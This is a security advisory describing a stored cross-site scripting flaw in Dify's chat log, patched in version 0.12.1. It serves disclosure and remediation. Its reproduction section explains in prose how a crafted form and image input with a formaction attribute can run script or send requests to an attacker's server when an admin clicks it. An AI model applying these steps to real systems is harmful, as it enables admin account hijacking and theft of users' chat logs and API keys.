Langgenius Dify Stored Cross-Site Scripting Vulnerability in Chat Log Functionality

A stored cross-site scripting vulnerability has been identified in Langgenius Dify, specifically in the latest version. The issue arises in the chat log feature, where certain HTML tags, such as <input> and <form>, are not properly restricted. This oversight allows an attacker to inject malicious HTML into the chat log via prompts. When an admin reviews the log, the injected HTML can execute scripts that steal the admin's credentials or sensitive information. This vulnerability has been fixed in version 0.12.1.

Impact

Exploitation of this vulnerability allows an attacker to hijack an admin account in a published chatbot, potentially accessing other users' chat logs and API keys.

Reproduction

To reproduce this vulnerability, inject a <form> element containing an <input> of type 'image' into the chat log. The input should include a 'formaction' attribute that directs to a JavaScript alert or a request to an external server, such as one controlled by the attacker. Once the form is submitted, the injected image will appear in the chat log. When an admin clicks the image, the JavaScript payload will execute, demonstrating the cross-site scripting vulnerability.

Remediation

Users can update to Dify version 0.12.1 or later, where this vulnerability has been fixed.